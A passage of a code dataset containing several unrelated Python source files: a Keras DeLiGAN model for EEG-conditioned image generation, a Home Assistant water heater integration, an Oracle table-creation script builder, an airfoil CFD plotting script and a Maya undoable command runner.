)\n","repo_name":"curtisalexander/jinjaexperiments","sub_path":"a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73746753719","text":"from keras.layers.normalization import BatchNormalization\nfrom keras.layers import Dense, Flatten, Reshape, LeakyReLU, Dropout, Input, multiply\nfrom keras.layers.convolutional import Conv2D, Conv2DTranspose\nfrom keras.regularizers import l2\nfrom keras.initializers import RandomUniform\nfrom keras.layers.core import Activation\nfrom keras.models import Model\nfrom keras.engine.topology import Layer\nfrom keras import initializers\nfrom keras import regularizers\nimport keras.backend as K\n\n\nclass DeLiGANLayer(Layer):\n \"\"\"\n Layer based on the DeLiGAN.\n\n This layer allows the model to reparameterize the latent space as a (Gaussian)\n mixture model.\n \"\"\"\n\n def __init__(self,\n kernel_regularizer=None,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n **kwargs):\n \"\"\"\n Initialise the the layer.\n\n Here the initialisers and regulisars (to build the weights) are set.\n \"\"\"\n\n if 'input_shape' not in kwargs and 'input_dim' in kwargs:\n kwargs['input_shape'] = (kwargs.pop('input_dim'),)\n super(DeLiGANLayer, self).__init__(**kwargs)\n self.kernel_initializer = initializers.get(kernel_initializer)\n self.bias_initializer = initializers.get(bias_initializer)\n self.kernel_regularizer = regularizers.get(kernel_regularizer)\n\n def build(self, input_shape):\n \"\"\"\n Build the weights of the layer (__call__() automatically runs this).\n\n Allows for the lazy creation of weights once the input shape is known. This\n method builds std and mean that will be used for f(x)=x*std+mean.\n\n input: input_shape: the input shape to the layer.\n \"\"\"\n\n assert len(input_shape) >= 2\n input_dim = input_shape[-1]\n\n self.std = self.add_weight(shape=(input_dim,),\n name='std',\n initializer=self.kernel_initializer,\n regularizer=self.kernel_regularizer)\n\n self.mean = self.add_weight(shape=(input_dim,),\n initializer=self.bias_initializer,\n name='mean')\n\n self.built = True\n\n def call(self, inputs):\n \"\"\"\n The layers forward pass.\n\n input: inputs: input to the layer.\n output: output of the layer is f(input)=input*std+mean.\n \"\"\"\n\n output = inputs * self.std\n output = K.bias_add(output, self.mean)\n return output\n\n def compute_output_shape(self, input_shape):\n \"\"\"\n Computes the shape of the layer output.\n \"\"\"\n\n assert input_shape and len(input_shape) >= 2\n assert input_shape[-1]\n output_shape = list(input_shape)\n output_shape[-1] = input_shape[-1]\n return tuple(output_shape)\n\n\n\ndef build_generator(noise_dim, feature_dim):\n \"\"\"\n Builds the generator for the hybrid DeLiGAN using EEG embeddings.\n\n This generator uses the DeLiGAN approach of reparameterizing the latent space\n and then uses transposed convolutional layers to upsample to a 64x63x3 image.\n It is also a hybrid of the DeLiGAN as we use the auxiliary classifier GAN\n (AC-GAN) approach with a pretrained classifier (trained in\n image_classifier.ipynb).\n\n input: noise_dim: dimension of the noise.\n input: feature_dim: dimension of the EEG embeddings.\n return: a model that takes noise and embeddings as input and outputs a 64x63x3\n image.\n \"\"\"\n\n noise_input = Input(shape=(noise_dim,))\n eeg_embedding_input = Input(shape=(feature_dim,))\n\n # softmax the EEG embedding\n eeg_soft_max = Activation('softmax')(eeg_embedding_input)\n\n # mixture model\n x = DeLiGANLayer(\n kernel_initializer=RandomUniform(minval=-0.2, maxval=0.2),\n bias_initializer=RandomUniform(minval=-1.0, maxval=1.0),\n kernel_regularizer=l2(0.01))(noise_input)\n\n # apply a transformation to the result of the mixture model\n x = Dense(feature_dim, activation=\"tanh\")(x)\n x = multiply([x, eeg_soft_max])\n\n # standard generator\n x = BatchNormalization(momentum=0.8)(x)\n x = Dense(512 * 4 * 4, activation=\"relu\")(x)\n x = Reshape((4, 4, 512))(x)\n x = BatchNormalization(momentum=0.8)(x)\n x = Conv2DTranspose(filters=256, kernel_size=5, strides=2, padding='same', activation='relu')(x)\n x = BatchNormalization(momentum=0.8)(x)\n x = Conv2DTranspose(filters=128, kernel_size=5, strides=2, padding='same', activation='relu')(x)\n x = BatchNormalization(momentum=0.8)(x)\n x = Conv2DTranspose(filters=64, kernel_size=5, strides=2, padding='same', activation='relu')(x)\n x = BatchNormalization(momentum=0.8)(x)\n x = Conv2DTranspose(filters=3, kernel_size=5, strides=2, padding='same', activation='relu')(x)\n output = Activation(\"tanh\")(x)\n\n return Model(inputs=[noise_input, eeg_embedding_input], outputs=[output])\n\n\ndef build_discriminator(input_img_shape, classifier_model):\n \"\"\"\n Builds the discriminator.\n\n This disrciminator follows the 'hybrid' approach of the AC-GAN but with\n a pretrained classifier (trained in image_classifier.ipynb). Here we\n are using Keras' functional API with the input being a 64x64x3 image\n and the output being the prediction of real/fake, as well as the\n auxiliary output which is a prediction of the image class.\n\n input: input_img_shape: shape of the input (the image)\n input: classifier_model: pretrained classifier (predicts the image class).\n return: a model with image input and two outputs: the real/fake prediction\n and the auxiliary prediction.\n \"\"\"\n\n img_input = Input(shape=(input_img_shape[0], input_img_shape[1], 3))\n x = Conv2D(16, (3, 3), strides=2)(img_input)\n x = LeakyReLU(0.2)(x)\n x = Dropout(0.5)(x)\n x = BatchNormalization()(x)\n x = Conv2D(32, (3, 3), strides=1)(x)\n x = LeakyReLU(0.2)(x)\n x = Dropout(0.5)(x)\n x = BatchNormalization()(x)\n x = Conv2D(64, (3, 3), strides=2)(x)\n x = LeakyReLU(0.2)(x)\n x = Dropout(0.5)(x)\n x = BatchNormalization()(x)\n x = Conv2D(128, (3, 3), strides=1)(x)\n x = LeakyReLU(0.2)(x)\n x = Dropout(0.5)(x)\n x = BatchNormalization()(x)\n x = Conv2D(256, (3, 3), strides=2)(x)\n x = LeakyReLU(0.2)(x)\n x = Dropout(0.5)(x)\n x = BatchNormalization()(x)\n x = Conv2D(512, (3, 3), strides=1)(x)\n x = LeakyReLU(0.2)(x)\n x = Dropout(0.5)(x)\n x = Flatten()(x)\n\n fake = Dense(1, activation='sigmoid')(x)\n classifier_model.trainable = False\n\n # the pretrained classifier\n aux = classifier_model(inputs=[img_input])\n\n return Model(inputs=[img_input], outputs=[fake, aux])\n\n\ndef build_gan(noise_dim, feature_dim, g, d):\n \"\"\"\n The GAN model. This is the composite of both the discriminator and\n generator.\n\n This function builds the composite model, allowing the generator to\n be trained in relation to the discriminator result (i.e. generator\n trained to trick the discriminator) while the discriminator is not in\n a trainable state.\n\n input: noise_dim: dimension of the noise.\n input: feature_dim: dimension of the features (EEG embeddings).\n input: g: the generator model.\n input: d: the discriminator model.\n\n return: the composite model D(G(x,e)), for generator G, discriminator\n D, noise x and embeddings e.\n \"\"\"\n\n noise_input = Input(shape=(noise_dim,))\n eeg_embedding_input = Input(shape=(feature_dim,))\n g_output = g(inputs=[noise_input, eeg_embedding_input])\n # d.trainable = False\n fake, aux = d(inputs=[g_output])\n return Model(inputs=[noise_input, eeg_embedding_input], outputs=[fake, aux])","repo_name":"jamespeaker/conditioning-GANs-with-brain-signals","sub_path":"training_gan/models/hybrid_deligan_eeg.py","file_name":"hybrid_deligan_eeg.py","file_ext":"py","file_size_in_byte":7732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34492633608","text":"\"\"\"Support for water heaters.\"\"\"\r\nimport logging\r\n\r\nfrom homeassistant.components.water_heater import (\r\n WaterHeaterEntity,\r\n STATE_GAS,\r\n SUPPORT_AWAY_MODE,\r\n SUPPORT_TARGET_TEMPERATURE,\r\n SUPPORT_OPERATION_MODE,\r\n)\r\nfrom homeassistant.config_entries import ConfigEntry\r\nfrom homeassistant.const import ATTR_TEMPERATURE, STATE_OFF, UnitOfTemperature, TEMP_CELSIUS,Platform\r\nfrom homeassistant.core import HomeAssistant\r\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\r\nfrom homeassistant.helpers.entity import DeviceInfo\r\n\r\nfrom . import async_register_entity\r\nfrom .coordinator import DeviceCoordinator\r\nfrom .core.attribute import HaierAttribute\r\nfrom .core.device import HaierDevice\r\nfrom .entity import HaierAbstractEntity\r\nfrom .helpers import try_read_as_bool\r\n\r\n_LOGGER = logging.getLogger(__name__)\r\n\r\nSUPPORT_FLAGS = (\r\n SUPPORT_AWAY_MODE | SUPPORT_TARGET_TEMPERATURE | SUPPORT_OPERATION_MODE\r\n)\r\n\r\n\r\nasync def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry, async_add_entities) -> None:\r\n await async_register_entity(\r\n hass,\r\n entry,\r\n async_add_entities,\r\n Platform.WATER_HEATER,\r\n lambda coordinator, device, attribute: HaierWaterHeater(coordinator, device, attribute)\r\n )\r\n\r\n\r\nclass HaierWaterHeater(HaierAbstractEntity,WaterHeaterEntity):\r\n\r\n def __init__(self, coordinator: DeviceCoordinator, device: HaierDevice, attribute: HaierAttribute):\r\n super().__init__(coordinator, device, attribute)\r\n self._attr_temperature_unit = TEMP_CELSIUS\r\n self._attr_supported_features = SUPPORT_FLAGS\r\n # 默认的0-70温度范围太宽,homekit不支持\r\n self._attr_min_temp = 35\r\n self._attr_max_temp = 50\r\n\r\n @property\r\n def operation_list(self):\r\n \"\"\"List of available operation modes.\"\"\"\r\n return [STATE_OFF, STATE_GAS]\r\n \r\n\r\n def set_temperature(self, **kwargs) -> None:\r\n self._send_command({\r\n 'targetTemp': kwargs['temperature']\r\n })\r\n\r\n def _update_value(self):\r\n if 'outWaterTemp' in self.coordinator.data:\r\n self._attr_current_temperature = float(self.coordinator.data['outWaterTemp'])\r\n\r\n self._attr_target_temperature = float(self.coordinator.data['targetTemp'])\r\n\r\n if not try_read_as_bool(self.coordinator.data['onOffStatus']):\r\n # 关机状态\r\n self._attr_current_operation = STATE_OFF\r\n self._attr_is_away_mode_on = True\r\n else:\r\n # 开机状态\r\n self._attr_current_operation = STATE_GAS\r\n self._attr_is_away_mode_on = False\r\n \r\n def turn_away_mode_on(self):\r\n \"\"\"Turn away mode on.\"\"\"\r\n self._send_command({\r\n 'onOffStatus': False\r\n })\r\n\r\n def turn_away_mode_off(self):\r\n \"\"\"Turn away mode off.\"\"\"\r\n self._send_command({\r\n 'onOffStatus': True\r\n })\r\n\r\n def set_operation_mode(self,operation_mode):\r\n \"\"\"Set operation mode\"\"\"\r\n if operation_mode == STATE_GAS:\r\n power_state = True\r\n else:\r\n power_state = False\r\n self._send_command({\r\n 'onOffStatus': power_state\r\n })","repo_name":"banto6/haier","sub_path":"custom_components/haier/water_heater.py","file_name":"water_heater.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":253,"dataset":"github-code","pt":"40"} +{"seq_id":"41635277626","text":"from typing import Callable, Dict, List, Optional, Tuple, Union\n\nfrom watchmen_model.admin import Factor, FactorType, is_aggregation_topic, is_raw_topic, Topic\nfrom watchmen_storage import as_table_name\nfrom watchmen_utilities import ArrayHelper, is_blank, is_not_blank\n\n\n# noinspection DuplicatedCode\ndef ask_column_name(factor: Factor) -> str:\n\treturn factor.name.strip().lower().replace('.', '_').replace('-', '_').replace(' ', '_')\n\n\ndef varchar_column(precision: str) -> str:\n\treturn f'VARCHAR2({precision})'\n\n\ndef varchar_10(precision: Optional[str] = '10') -> str:\n\treturn varchar_column('10' if is_blank(precision) else precision)\n\n\ndef varchar_20(precision: Optional[str] = '20') -> str:\n\treturn varchar_column('20' if is_blank(precision) else precision)\n\n\ndef varchar_50(precision: Optional[str] = '50') -> str:\n\treturn varchar_column('50' if is_blank(precision) else precision)\n\n\ndef varchar_100(precision: Optional[str] = '100') -> str:\n\treturn varchar_column('100' if is_blank(precision) else precision)\n\n\ndef varchar_255(precision: Optional[str] = '255') -> str:\n\treturn varchar_column('255' if is_blank(precision) else precision)\n\n\ndef decimal_column(precision: str) -> str:\n\treturn f'NUMBER({precision})'\n\n\ndef decimal_10_2(precision: Optional[str] = '10,2') -> str:\n\treturn decimal_column('10,2' if is_blank(precision) else precision)\n\n\ndef decimal_32_6(precision: Optional[str] = '32,6') -> str:\n\treturn decimal_column('32,6' if is_blank(precision) else precision)\n\n\nFactorTypeMap: Dict[FactorType, Union[str, Callable[[Optional[str]], str]]] = {\n\tFactorType.SEQUENCE: 'NUMBER(20)',\n\n\tFactorType.NUMBER: decimal_32_6,\n\tFactorType.UNSIGNED: decimal_32_6,\n\n\tFactorType.TEXT: varchar_255,\n\n\t# address\n\tFactorType.ADDRESS: 'VARCHAR2(1024)',\n\tFactorType.CONTINENT: varchar_10,\n\tFactorType.REGION: varchar_10,\n\tFactorType.COUNTRY: varchar_10,\n\tFactorType.PROVINCE: varchar_10,\n\tFactorType.CITY: varchar_10,\n\tFactorType.DISTRICT: varchar_255,\n\tFactorType.ROAD: varchar_255,\n\tFactorType.COMMUNITY: varchar_100,\n\tFactorType.FLOOR: 'NUMBER(5)',\n\tFactorType.RESIDENCE_TYPE: varchar_10,\n\tFactorType.RESIDENTIAL_AREA: decimal_10_2,\n\n\t# contact electronic\n\tFactorType.EMAIL: varchar_100,\n\tFactorType.PHONE: varchar_50,\n\tFactorType.MOBILE: varchar_50,\n\tFactorType.FAX: varchar_50,\n\n\t# date time related\n\tFactorType.DATETIME: 'DATE',\n\tFactorType.FULL_DATETIME: 'DATE',\n\tFactorType.DATE: 'DATE',\n\tFactorType.TIME: 'DATE',\n\tFactorType.YEAR: 'NUMBER(5)',\n\tFactorType.HALF_YEAR: 'NUMBER(3)',\n\tFactorType.QUARTER: 'NUMBER(3)',\n\tFactorType.MONTH: 'NUMBER(3)',\n\tFactorType.HALF_MONTH: 'NUMBER(3)',\n\tFactorType.TEN_DAYS: 'NUMBER(3)',\n\tFactorType.WEEK_OF_YEAR: 'NUMBER(3)',\n\tFactorType.WEEK_OF_MONTH: 'NUMBER(3)',\n\tFactorType.HALF_WEEK: 'NUMBER(3)',\n\tFactorType.DAY_OF_MONTH: 'NUMBER(3)',\n\tFactorType.DAY_OF_WEEK: 'NUMBER(3)',\n\tFactorType.DAY_KIND: 'NUMBER(3)',\n\tFactorType.HOUR: 'NUMBER(3)',\n\tFactorType.HOUR_KIND: 'NUMBER(3)',\n\tFactorType.MINUTE: 'NUMBER(3)',\n\tFactorType.SECOND: 'NUMBER(3)',\n\tFactorType.MILLISECOND: 'NUMBER(3)',\n\tFactorType.AM_PM: 'NUMBER(3)',\n\n\t# individual\n\tFactorType.GENDER: varchar_10,\n\tFactorType.OCCUPATION: varchar_10,\n\tFactorType.DATE_OF_BIRTH: 'DATE',\n\tFactorType.AGE: 'NUMBER(5)',\n\tFactorType.ID_NO: varchar_50,\n\tFactorType.RELIGION: varchar_10,\n\tFactorType.NATIONALITY: varchar_10,\n\n\t# organization\n\tFactorType.BIZ_TRADE: varchar_10,\n\tFactorType.BIZ_SCALE: 'NUMBER(9)',\n\n\tFactorType.BOOLEAN: 'NUMBER(1)',\n\n\tFactorType.ENUM: varchar_20,\n\n\tFactorType.OBJECT: 'CLOB',\n\tFactorType.ARRAY: 'CLOB'\n}\n\n\ndef ask_column_type(factor: Factor) -> str:\n\tcolumn_type = FactorTypeMap.get(factor.type)\n\tif isinstance(column_type, str):\n\t\treturn column_type\n\telif is_blank(factor.precision):\n\t\treturn column_type()\n\telse:\n\t\treturn column_type(factor.precision.strip())\n\n\ndef build_columns(topic: Topic) -> str:\n\tif is_raw_topic(topic):\n\t\tflatten_factors = ArrayHelper(topic.factors) \\\n\t\t\t.filter(lambda x: x.flatten) \\\n\t\t\t.map(lambda x: f'\\t{ask_column_name(x)} {ask_column_type(x)},') \\\n\t\t\t.to_list()\n\t\tif len(flatten_factors) == 0:\n\t\t\treturn '\\tdata_ CLOB,'\n\t\telse:\n\t\t\treturn '\\n'.join(flatten_factors) + '\\n\\tdata_ CLOB,'\n\telse:\n\t\treturn ArrayHelper(topic.factors) \\\n\t\t\t.filter(lambda x: '.' not in x.name) \\\n\t\t\t.map(lambda x: f'\\t{ask_column_name(x)} {ask_column_type(x)},') \\\n\t\t\t.join('\\n')\n\n\n# noinspection DuplicatedCode\ndef build_aggregate_assist_column(topic: Topic) -> str:\n\treturn f'\\taggregate_assist_ VARCHAR2(1024),' if is_aggregation_topic(topic) else ''\n\n\ndef build_version_column(topic: Topic) -> str:\n\treturn f'\\tversion_ NUMBER(8),' if is_aggregation_topic(topic) else ''\n\n\n# noinspection SqlResolve,DuplicatedCode\ndef build_columns_script(topic: Topic, original_topic: Topic) -> List[str]:\n\tentity_name = as_table_name(topic)\n\toriginal_factors: Dict[str, Factor] = ArrayHelper(original_topic.factors) \\\n\t\t.to_map(lambda x: x.name.strip().lower(), lambda x: x)\n\n\t# noinspection SqlResolve\n\tdef build_column_script(factor: Tuple[Factor, Optional[Factor]]) -> str:\n\t\tcurrent_factor, original_factor = factor\n\t\tif original_factor is None:\n\t\t\treturn f'ALTER TABLE {entity_name} ADD ({ask_column_name(factor[0])} {ask_column_type(factor[0])})'\n\t\telif current_factor.flatten and not original_factor.flatten:\n\t\t\treturn f'ALTER TABLE {entity_name} ADD ({ask_column_name(factor[0])} {ask_column_type(factor[0])})'\n\t\telse:\n\t\t\treturn f'ALTER TABLE {entity_name} MODIFY ({ask_column_name(factor[0])} {ask_column_type(factor[0])})'\n\n\tif is_raw_topic(topic):\n\t\tfactors = ArrayHelper(topic.factors) \\\n\t\t\t.filter(lambda x: x.flatten) \\\n\t\t\t.to_list()\n\telse:\n\t\tfactors = topic.factors\n\n\tcolumns = ArrayHelper(factors) \\\n\t\t.map(lambda x: (x, original_factors.get(x.name.strip().lower()))) \\\n\t\t.map(build_column_script) \\\n\t\t.to_list()\n\n\tif is_raw_topic(topic) and not is_raw_topic(original_topic):\n\t\tcolumns.append(f'ALTER TABLE {entity_name} ADD COLUMN data_ CLOB')\n\n\tif is_aggregation_topic(topic) and not is_aggregation_topic(original_topic):\n\t\tcolumns.append(f'ALTER TABLE {entity_name} ADD COLUMN aggregate_assist_ VARCHAR2(1024)')\n\t\tcolumns.append(f'ALTER TABLE {entity_name} ADD COLUMN version_ NUMBER(8)')\n\n\treturn columns\n\n\ndef build_unique_indexes_script(topic: Topic) -> List[str]:\n\tindex_groups: Dict[str, List[Factor]] = ArrayHelper(topic.factors) \\\n\t\t.filter(lambda x: is_not_blank(x.indexGroup) and x.indexGroup.startswith('u-')) \\\n\t\t.group_by(lambda x: x.indexGroup)\n\n\t# noinspection SqlResolve\n\tdef build_unique_index(factors: List[Factor], index: int) -> str:\n\t\treturn \\\n\t\t\tf'CREATE UNIQUE INDEX u_{as_table_name(topic)}_{index + 1} ON {as_table_name(topic)} ' \\\n\t\t\tf'({ArrayHelper(factors).map(lambda x: ask_column_name(x)).join(\",\")})'\n\n\treturn ArrayHelper(list(index_groups.values())) \\\n\t\t.map_with_index(lambda x, index: build_unique_index(x, index)).to_list()\n\n\ndef build_indexes_script(topic: Topic) -> List[str]:\n\tindex_groups: Dict[str, List[Factor]] = ArrayHelper(topic.factors) \\\n\t\t.filter(lambda x: is_not_blank(x.indexGroup) and x.indexGroup.startswith('i-')) \\\n\t\t.group_by(lambda x: x.indexGroup)\n\n\t# noinspection SqlResolve\n\tdef build_index(factors: List[Factor], index: int) -> str:\n\t\treturn \\\n\t\t\tf'CREATE INDEX u_{as_table_name(topic)}_{index + 1} ON {as_table_name(topic)} ' \\\n\t\t\tf'({ArrayHelper(factors).map(lambda x: ask_column_name(x)).join(\",\")})'\n\n\treturn ArrayHelper(list(index_groups.values())) \\\n\t\t.map_with_index(lambda x, index: build_index(x, index)).to_list()\n\n\ndef build_table_script(topic: Topic) -> str:\n\tentity_name = as_table_name(topic)\n\t# noinspection SqlType\n\tscript = f'''\nCREATE TABLE {entity_name} (\n\\tid_ NUMBER(20),\n{build_columns(topic)}\n{build_aggregate_assist_column(topic)}\n{build_version_column(topic)}\n\\ttenant_id_ VARCHAR2(50),\n\\tinsert_time_ DATE,\n\\tupdate_time_ DATE,\n\\tCONSTRAINT pk_{entity_name} PRIMARY KEY (id_)\n)'''\n\treturn script\n","repo_name":"Indexical-Metrics-Measure-Advisory/watchmen","sub_path":"packages/watchmen-storage-oracle/src/watchmen_storage_oracle/table_creator.py","file_name":"table_creator.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"31958427493","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\nimport os\n\nplt.rcParams.update({\n 'text.usetex': True,\n 'figure.dpi': 150})\n\nplt.tight_layout()\n\ndef getsweepdata(sweepdir):\n\n cwd = os.getcwd()\n files = os.listdir(sweepdir)\n files = np.array(files)\n coefficients = np.zeros((len(files),3))\n angles = np.arange(-8, 18, 2)\n\n sfiles = [ifile.replace(\"GRTsteady\", \"\") for ifile in files]\n sfiles = np.array([ifile.replace(\"Mesh8\", \"\") for ifile in sfiles]).astype(int)\n #print(sfiles)\n\n files = files[sfiles.argsort()]\n #print(files)\n\n for i, file in enumerate(files):\n os.chdir(os.path.join(sweepdir,file))\n coefs = np.loadtxt(\"postProcessing/forceCoeffs/0/forceCoeffs.dat\", skiprows=9 , delimiter=\"\\t\")\n coefsmean = np.mean(coefs[-300:-100], axis=0)\n #print(coefs)\n coefficients[i, 1] = coefsmean[2]\n coefficients[i, 2] = coefsmean[3]\n os.chdir(cwd)\n\n return sorted(files), coefficients, angles\n\ndef get_coefficients(resultsdir):\n\n airdict = {}\n cwd = os.getcwd()\n\n fig1, ax1 = plt.subplots(figsize=(7,5), dpi=150)\n ax1.set_axisbelow(True)\n fig2, ax2 = plt.subplots(figsize=(7,5), dpi=150)\n ax2.set_axisbelow(True)\n fig3, ax3 = plt.subplots(figsize=(7,5), dpi=150)\n ax3.set_axisbelow(True)\n\n for i, sweepdir in enumerate(sorted(os.listdir(resultsdir))):\n\n os.chdir(os.path.join(resultsdir, sweepdir))\n _, coef, angles = getsweepdata(os.getcwd())\n angles = angles[angles!=-6.]\n angles = angles[angles!=-8.]\n coef = coef[2:-2]\n\n airdict[\"mod\"+str(i)+\"lift\"] = coef[:,2]\n airdict[\"mod\"+str(i)+\"drag\"] = coef[:,1]\n\n ax1.plot(angles, coef[:, 1], marker='.', label='SG6043 mod'+str(i))\n ax1.set_ylabel(r\"$C_\\mathrm{drag}$\")\n ax1.set_xlabel(r\"Angle of attack $[^\\circ]$\")\n ax2.plot(angles, coef[:, 2], marker='.', label='SG6043 mod'+str(i))\n ax2.set_ylabel(r\"$C_\\mathrm{lift}$\")\n ax2.set_xlabel(r\"Angle of attack $[^\\circ]$\")\n ax3.plot(angles, coef[:,2]/coef[:,1], marker='.', label='SG6043 mod'+str(i))\n ax3.set_ylabel(r\"$C_\\mathrm{lift}/C_\\mathrm{drag}$\")\n ax3.set_xlabel(r\"Angle of attack $[^\\circ]$\")\n os.chdir(cwd)\n \"\"\"\n else: \n print(i)\n os.chdir(os.path.join(resultsdir, sweepdir))\n _, coef, angles = getsweepdata(os.getcwd())\n angles = angles[angles!=-6.]\n\n coef = coef[1:-2]\n airdict[\"mod\"+str(i)+\"lift\"] = coef[:,2].tolist().append(0.)\n airdict[\"mod\"+str(i)+\"drag\"] = coef[:,1].tolist().append(0.)\n \n\n ax1.plot(angles, coef[:, 1], marker='.', label='SG6043 mod'+str(i))\n ax1.set_ylabel(r\"$C_\\mathrm{drag}$\")\n ax1.set_xlabel(r\"Angle of attack $[^\\circ]$\")\n ax2.plot(angles, coef[:,2], marker='.', label='SG6043 mod'+str(i))\n ax2.set_ylabel(r\"$C_\\mathrm{lift}$\")\n ax2.set_xlabel(r\"Angle of attack $[^\\circ]$\")\n ax3.plot(angles, coef[:,2]/coef[:,1], marker='.', label='SG6043 mod'+str(i))\n ax3.set_ylabel(r\"$C_\\mathrm{lift}/C_\\mathrm{drag}$\")\n ax3.set_xlabel(r\"Angle of attack $[^\\circ]$\")\n os.chdir(cwd)\n \"\"\"\n\n box1 = ax1.get_position()\n ax1.set_position([box1.x0, box1.y0, box1.width * 0.8, box1.height])\n ax1.grid()\n\n # Put a legend to the right of the current axis\n ax1.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\n box2 = ax2.get_position()\n ax2.set_position([box2.x0, box2.y0, box2.width * 0.8, box2.height])\n ax2.grid()\n\n # Put a legend to the right of the current axis\n ax2.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\n box3 = ax3.get_position()\n ax3.set_position([box3.x0, box3.y0, box3.width * 0.8, box3.height])\n ax3.grid()\n\n # Put a legend to the right of the current axis\n ax3.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\n fig1.savefig(\"modifieddrag.svg\")\n fig2.savefig(\"modifiedlift.svg\")\n fig3.savefig(\"modifiedliftdragratio.svg\")\n \n p = pd.DataFrame(airdict)\n p.to_csv(\"coefs.csv\", float_format=\"%.4f\")\n\nif __name__ == \"__main__\":\n\n try: \n resultsdir = str(sys.argv[1])\n \n except (IndexError, ValueError):\n raise SystemExit\n \n get_coefficients(resultsdir)\n \n","repo_name":"jkhansell/CFDFinalProject","sub_path":"UnstructuredGrids/walls/ValidationNBs/getCSVdata.py","file_name":"getCSVdata.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37817559604","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nModule that contains Maya command implementation\n\"\"\"\n\nimport sys\nimport traceback\nfrom typing import Any\n\nfrom overrides import override\nimport maya.cmds as cmds\nimport maya.api.OpenMaya as OpenMaya\n\nfrom tp.core import log, command, exceptions\nfrom tp.maya.cmds import helpers\nfrom tp.maya.api import output\n\nlogger = log.tpLogger\n\n\nclass MayaCommand(command.DccCommand):\n\n @override\n def do(self, **kwargs: dict) -> Any:\n raise NotImplementedError\n\n\nclass MayaCommandRunner(command.BaseCommandRunner):\n \"\"\"\n Maya Command runner implementation that allows to inject DCC commands into the Maya undo stack.\n \"\"\"\n\n def __init__(self):\n super().__init__(interface=MayaCommand)\n\n OpenMaya._COMMAND_RUNNER = None\n helpers.load_plugin('tpundo.py')\n\n @override\n def run(self, command_id: str, **kwargs: dict) -> Any:\n\n logger.debug(f'Executing command: \"{command_id}\"')\n\n command_to_run = self.find_command(command_id)\n if command_to_run is None:\n raise ValueError(f'No command found with given id \"{command_id}\"')\n\n if OpenMaya._COMMAND_RUNNER is None:\n OpenMaya._COMMAND_RUNNER = self\n\n command_to_run = command_to_run()\n if not command_to_run.is_enabled:\n return\n try:\n command_to_run.parse_arguments(kwargs)\n if command_to_run.requires_warning():\n output.MayaOutput.display_warning(command_to_run.warning_message())\n return\n except exceptions.CommandCancel:\n return\n except Exception:\n raise\n\n exc_tb, exc_type, exc_value = None, None, None\n command_to_run.stats = command.CommandStats(command_to_run)\n try:\n if command_to_run.is_undoable:\n cmds.undoInfo(openChunk=True, chunkName=command_to_run.id)\n self._undo_stack.append(command_to_run)\n OpenMaya._TPDCC_COMMAND = command_to_run\n cmds.tpDccUndo(id=command_to_run.id)\n return command_to_run._return_result\n except exceptions.CommandCancel:\n command_to_run.stats.finish(None)\n except Exception:\n exc_type, exc_value, exc_trace = sys.exc_info()\n if command_to_run.is_undoable and command_to_run.use_undo_chunk:\n self._undo_stack.pop()\n raise\n finally:\n tb = None\n if exc_type and exc_value and exc_tb:\n tb = traceback.format_exception(exc_type, exc_value, exc_tb)\n if command_to_run.is_undoable and command_to_run.use_undo_chunk:\n cmds.undoInfo(closeChunk=True)\n command_to_run.stats.finish(tb)\n logger.debug(f'Finished executing command: \"{command_id}\"')\n\n @override\n def undo_last(self) -> bool:\n if not self._undo_stack:\n return False\n\n command_to_undo = self._undo_stack[-1]\n if command_to_undo is None or not command_to_undo.is_undoable:\n return False\n\n exc_tb, exc_type, exc_value = None, None, None\n try:\n command_to_undo.stats = command.CommandStats(command_to_undo)\n cmds.undo()\n except exceptions.CommandCancel:\n command_to_undo.stats.finish(None)\n return False\n except Exception:\n exc_type, exc_value, exc_tb = sys.exc_info()\n raise\n finally:\n tb = None\n if exc_type and exc_value and exc_tb:\n tb = traceback.format_exception(exc_type, exc_value, exc_tb)\n elif command_to_undo.is_undoable:\n self._undo_stack.remove(command_to_undo)\n self._redo_stack.append(command_to_undo)\n command_to_undo.stats.finish(tb)\n\n return True\n\n def redo_last(self) -> Any:\n\n if not self._redo_stack:\n return\n\n result = None\n command_to_redo = self._redo_stack[-1]\n if command_to_redo is None:\n return result\n\n exc_tb, exc_type, exc_value = None, None, None\n try:\n command_to_redo.stats = command.CommandStats(command_to_redo)\n cmds.redo()\n except exceptions.CommandCancel:\n command_to_redo.stats.finish(None)\n return\n except Exception:\n exc_type, exc_value, exc_tb = sys.exc_info()\n raise\n finally:\n tb = None\n command_to_redo = self._redo_stack.pop()\n if exc_type and exc_value and exc_tb:\n tb = traceback.format_exception(exc_type, exc_value, exc_tb)\n elif command_to_redo.is_undoable:\n self._undo_stack.append(command_to_redo)\n command_to_redo.stats.finish(tb)\n\n return result\n\n @override\n def flush(self):\n super().flush()\n cmds.flushUndo()\n\n @override\n def _run(self, command_to_run: command.DccCommand) -> Any:\n if OpenMaya.MGlobal.isRedoing():\n if self._redo_stack:\n self._redo_stack.pop()\n result = super()._run(command_to_run)\n self._undo_stack.append(command_to_run)\n return result\n try:\n return super(MayaCommandRunner, self)._run(command_to_run)\n except Exception:\n logger.error(f'Unhandled exception ocurred in command \"{command_to_run.id}\"')\n raise\n","repo_name":"tpoveda/tp-dcc-tools","sub_path":"packages/tp-dcc-maya/tp/maya/api/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"1275004370","text":"n = int(input())\narr = []\nprofit = 0\ncount = 0\nm = 0\n\n# inserting tuples!\nfor 